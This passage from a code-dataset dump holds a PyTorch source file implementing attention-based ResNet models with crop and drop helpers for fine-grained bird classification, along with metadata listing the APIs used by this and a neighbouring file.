"matplotlib.pyplot", "line_number": 508, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 509, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 509, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 510, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 510, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 512, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 514, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 514, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 515, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 515, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 516, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 516, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 517, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 517, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 519, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 519, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 520, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 520, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 521, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 522, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 523, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 523, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 524, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 524, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 526, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 526, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 527, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 527, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 528, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 528, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 529, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 529, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 530, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 530, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 531, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 531, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 534, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 537, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 537, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 538, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 538, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 540, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 540, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 541, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 541, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 542, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 542, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 543, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 543, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 545, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 545, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 546, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 546, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 547, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 548, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 548, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 549, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 549, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 550, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 550, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 551, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 551, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 552, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 552, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 553, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 553, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 559, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 559, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 560, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 560, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 563, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 563, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 564, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 564, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 565, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 565, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 565, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 566, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 566, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 567, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 569, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 569, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 570, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 570, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 571, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 571, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 572, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 572, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 573, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 573, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 574, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 574, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 575, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 575, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 575, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 576, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 576, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 577, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 577, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 579, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 579, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 580, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 580, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 581, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 581, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 582, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 582, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 583, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 583, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 584, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 584, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 585, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 585, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 585, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 586, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 586, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 587, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 587, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 589, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 589, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 590, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 590, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 591, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 591, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 592, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 592, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 593, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 593, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 594, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 594, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 595, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 595, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 596, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 596, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 597, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 597, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 599, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 600, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 600, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "PySimpleGUI.Text", "line_number": 626, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 627, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 629, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 636, "usage_type": "call"}]}
+{"seq_id": "4057107701", "text": "import math\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as model_zoo\nimport random\n\n__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',\n 'resnet152']\n\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n}\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass BasicConv2d(nn.Module):\n\n def __init__(self, in_channels, out_channels, **kwargs):\n super(BasicConv2d, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n return F.relu(x, inplace=True)\n\nclass Attention(nn.Module):\n \n def __init__(self, in_channels, out_channels, **kwargs):\n super(Attention, self).__init__()\n self.conv1 = BasicConv2d(in_channels, 512, kernel_size=1)\n self.conv2 = BasicConv2d(512, out_channels, kernel_size=1)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000, num_attentions=32, zero_init_residual=False):\n super(ResNet, 
self).__init__()\n self.inplanes = 64\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n # [64, 112, 112]\n self.layer1 = self._make_layer(block, 64, layers[0])\n # [64, 112, 112]\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n # [128, 56, 56]\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n # [256, 28, 28]\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n # [512, 14, 14]\n \n# self.attention = BasicConv2d(512 * block.expansion, num_attentions, kernel_size=1)\n self.attention = Attention(512 * block.expansion, num_attentions)\n \n# self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(512 * block.expansion * num_attentions, num_classes)\n\n self.register_buffer('center', torch.zeros(num_classes, num_attentions * 512 * block.expansion))\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n \n def _bilinear_attention_pooling(self, x, a):\n x = x.view(x.size(0), x.size(1), -1)\n a = a.view(a.size(0), a.size(1), -1)\n x = torch.bmm(x, torch.transpose(a, 1, 2)) / (12**2)\n x = x.view(x.size(0), -1)\n x = torch.sqrt(x+1e-12)\n x = F.normalize(x)\n return x\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n att = self.attention(x)\n self.att_map = att\n \n x = self._bilinear_attention_pooling(x, att)\n f = x\n \n x = x.view(x.size(0), -1)\n x = self.fc(x*100)\n \n return x, f, att\n\n\ndef resnet18(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-18 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))\n return model\n\n\ndef resnet34(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet34']))\n return model\n\n\ndef resnet50(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n 
pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)\n if pretrained:\n model_dict = model.state_dict()\n pretrained_dict = model_zoo.load_url(model_urls['resnet50'])\n model_dict.update(\n {k: v for k, v in pretrained_dict.items() if k in model_dict and v.size() == model_dict[k].size()})\n model.load_state_dict(model_dict)\n return model\n\n\ndef resnet101(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-101 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 4, 23, 3], **kwargs)\n if pretrained:\n model_dict = model.state_dict()\n pretrained_dict = model_zoo.load_url(model_urls['resnet101'])\n model_dict.update(\n {k: v for k, v in pretrained_dict.items() if k in model_dict and v.size() == model_dict[k].size()})\n model.load_state_dict(model_dict)\n return model\n\n\ndef resnet152(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-152 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)\n if pretrained:\n model.load_state_dict(model_zoo.load_url(model_urls['resnet152']))\n return model\n\n\ndef attention_crop(attention_maps):\n batch_size, num_parts, height, width = attention_maps.shape\n thetas = []\n for i in range(batch_size):\n attention_map = attention_maps[i]\n part_weights = torch.mean(torch.mean(attention_map, dim=1), dim=1)\n part_weights = torch.sqrt(part_weights)\n part_weights = part_weights / torch.sum(part_weights)\n selected_index = torch.multinomial(part_weights, 1, replacement=False, out=None)[0]\n\n mask = attention_map[selected_index, :, :]\n\n threshold = random.uniform(0.4, 0.6)\n itemindex = torch.nonzero(mask >= mask.max() * threshold)\n ymin = itemindex[:, 0].min().item() / height - 0.1\n ymax = itemindex[:, 0].max().item() / height + 0.1\n xmin = itemindex[:, 1].min().item() / width - 0.1\n xmax = itemindex[:, 1].max().item() / width + 0.1\n a = xmax - xmin\n e = ymax - ymin\n # crop weight=height\n pad = abs(a-e)/2.\n if a <= e:\n a = e\n xmin -= pad\n else:\n e = a\n ymin -= pad\n \n c = 2*xmin - 1 + a\n f = 2*ymin - 1 + e\n theta = np.asarray([[a, 0, c], [0, e, f]], dtype=np.float32)\n thetas.append(theta)\n thetas = np.asarray(thetas, np.float32)\n return thetas\n\n\ndef attention_drop(attention_maps):\n batch_size, num_parts, height, width = attention_maps.shape\n masks = []\n for i in range(batch_size):\n attention_map = attention_maps[i]\n part_weights = torch.mean(torch.mean(attention_map, dim=1), dim=1)\n part_weights = torch.sqrt(part_weights)\n part_weights = part_weights / torch.sum(part_weights)\n selected_index = torch.multinomial(part_weights, 1, replacement=False, out=None)[0]\n\n mask = attention_map[selected_index, :, :]\n # soft mask\n threshold = random.uniform(0.2, 0.5)\n mask = (mask < threshold * mask.max())\n masks.append(mask)\n# masks = np.asarray(masks, dtype=np.float32)\n masks = torch.stack(masks)\n masks = masks.type(torch.float32)\n masks = torch.unsqueeze(masks, dim=1)\n return masks\n\ndef mask2bbox(attention_maps):\n height = attention_maps.shape[2]\n width = attention_maps.shape[3]\n thetas = []\n for i in range(attention_maps.shape[0]):\n mask = attention_maps[i][0]\n max_activate = mask.max()\n min_activate = 0.1 * max_activate\n# mask = (mask >= min_activate)\n itemindex = torch.nonzero(mask >= min_activate)\n ymin = itemindex[:, 0].min().item() / height - 0.05\n ymax = 
itemindex[:, 0].max().item() / height + 0.05\n xmin = itemindex[:, 1].min().item() / width - 0.05\n xmax = itemindex[:, 1].max().item() / width + 0.05\n a = xmax - xmin\n e = ymax - ymin\n # crop weight=height\n pad = abs(a-e)/2.\n if a <= e:\n a = e\n xmin -= pad\n else:\n e = a\n ymin -= pad\n c = 2*xmin - 1 + a\n f = 2*ymin - 1 + e\n theta = np.asarray([[a, 0, c], [0, e, f]], dtype=np.float32)\n thetas.append(theta)\n thetas = np.asarray(thetas, np.float32)\n return thetas\n", "repo_name": "wangjie-ruc/FGVC-CUB200", "sub_path": "networks/ws_dan.py", "file_name": "ws_dan.py", "file_ext": "py", "file_size_in_byte": 12597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Conv2d", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 
129, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 138, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 153, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 160, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 161, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 162, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 170, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 170, 